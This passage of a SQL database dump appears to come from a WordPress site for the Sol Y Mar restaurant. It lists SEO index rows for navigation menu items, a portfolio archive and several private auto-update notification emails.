17:33:04',1,NULL,NULL,NULL,NULL,0,NULL),(2411,NULL,NULL,4431,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2412,NULL,NULL,4432,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2413,NULL,NULL,4433,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2414,NULL,NULL,4434,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2415,NULL,NULL,4435,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2593,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-7/','123:2d380dd2ad2b39ad1b56951405c3c172',4620,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-02-11 14:52:52','2021-02-11 19:52:52',1,NULL,NULL,NULL,NULL,0,NULL),(2416,NULL,NULL,4436,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2417,NULL,NULL,4437,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2418,NULL,NULL,4438,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2419,NULL,NULL,4439,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2420,NULL,NULL,4440,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2592,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-6/','123:b76ea49c454c5e1992cb4a17dc861da6',4619,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-02-10 13:40:02','2021-02-10 18:40:02',1,NULL,NULL,NULL,NULL,0,NULL),(2421,NULL,NULL,4441,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2422,NULL,NULL,4442,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2423,NULL,NULL,4443,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2424,NULL,NULL,4444,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2425,NULL,NULL,4445,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:23','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2426,NULL,NULL,4446,'post','nav_menu_item',1,3061,NULL,NULL,'Four Columns Wide','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2591,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-5/','123:a22224ba059584c30aa2ffda8014e480',4618,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-02-10 03:08:03','2021-02-10 08:08:03',1,NULL,NULL,NULL,NULL,0,NULL),(2427,NULL,NULL,4447,'post','nav_menu_item',1,3061,NULL,NULL,'Four Columns','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2428,NULL,NULL,4448,'post','nav_menu_item',1,3061,NULL,NULL,'Three Columns','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2429,NULL,NULL,4449,'post','nav_menu_item',1,0,NULL,NULL,'Big Slider','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2430,NULL,NULL,4450,'post','nav_menu_item',1,0,NULL,NULL,'Small Images','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2590,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-4/','123:fe1997304118d77038cb20345162cd73',4617,'post','postman_sent_mail',0,0,NULL,NULL,'Privato: [Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','private',0,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-02-08 14:40:06','2021-02-08 19:40:06',1,NULL,NULL,NULL,NULL,0,NULL),(2431,NULL,NULL,4451,'post','nav_menu_item',1,0,NULL,NULL,'Big Images','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2432,NULL,NULL,4452,'post','nav_menu_item',1,0,NULL,NULL,'Big Gallery','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2433,NULL,NULL,4453,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2434,NULL,NULL,4454,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2435,NULL,NULL,4455,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2436,NULL,NULL,4456,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2437,NULL,NULL,4457,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2438,NULL,NULL,4458,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2439,NULL,NULL,4459,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2440,NULL,NULL,4460,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2441,NULL,NULL,4461,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2442,NULL,NULL,4462,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2443,NULL,NULL,4463,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2444,NULL,NULL,4464,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2445,NULL,NULL,4465,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2446,NULL,NULL,4466,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2447,NULL,NULL,4467,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2589,'https://www.ristorantesolymar.it/vecchio/portfolio-item/','56:7478a3adbb9c17dcb28097506c578c1f',NULL,'post-type-archive','portfolio-item',NULL,NULL,'Archivi %%pt_plural%% %%page%% %%sep%% %%sitename%%','','Attika Portfolio',NULL,1,0,NULL,NULL,NULL,NULL,NULL,NULL,0,0,0,0,0,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'2021-02-05 04:31:14','2021-02-05 09:31:14',1,NULL,NULL,NULL,NULL,0,NULL),(2448,NULL,NULL,4468,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2449,NULL,NULL,4469,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2450,NULL,NULL,4470,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2451,NULL,NULL,4471,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2452,NULL,NULL,4472,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2453,NULL,NULL,4473,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2454,NULL,NULL,4474,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2455,NULL,NULL,4475,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2456,NULL,NULL,4476,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2457,NULL,NULL,4477,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:24','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2458,NULL,NULL,4478,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2459,NULL,NULL,4479,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2460,NULL,NULL,4480,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2461,NULL,NULL,4481,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2462,NULL,NULL,4482,'post','nav_menu_item',1,0,NULL,NULL,'Standard','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2463,NULL,NULL,4483,'post','nav_menu_item',1,0,NULL,NULL,'Gallery','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2464,NULL,NULL,4484,'post','nav_menu_item',1,0,NULL,NULL,'Link','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2465,NULL,NULL,4485,'post','nav_menu_item',1,0,NULL,NULL,'Quote','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2466,NULL,NULL,4486,'post','nav_menu_item',1,0,NULL,NULL,'Video','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2467,NULL,NULL,4487,'post','nav_menu_item',1,0,NULL,NULL,'Audio','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2468,NULL,NULL,4488,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2469,NULL,NULL,4489,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2470,NULL,NULL,4490,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2471,NULL,NULL,4491,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2472,NULL,NULL,4492,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2473,NULL,NULL,4493,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,0,NULL),(2474,NULL,NULL,4494,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2475,NULL,NULL,4495,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2476,NULL,NULL,4496,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2477,NULL,NULL,4497,'post','nav_menu_item',1,3039,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:25','2021-01-29 19:07:17',1,NULL,NULL,NULL,NULL,1,NULL),(2478,NULL,NULL,4498,'post','nav_menu_item',1,0,NULL,NULL,'','publish',NULL,0,NULL,NULL,NULL,NULL,NULL,0,0,NULL,0,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,0,NULL,NULL,'2021-01-23 17:56:25','2021-01-29 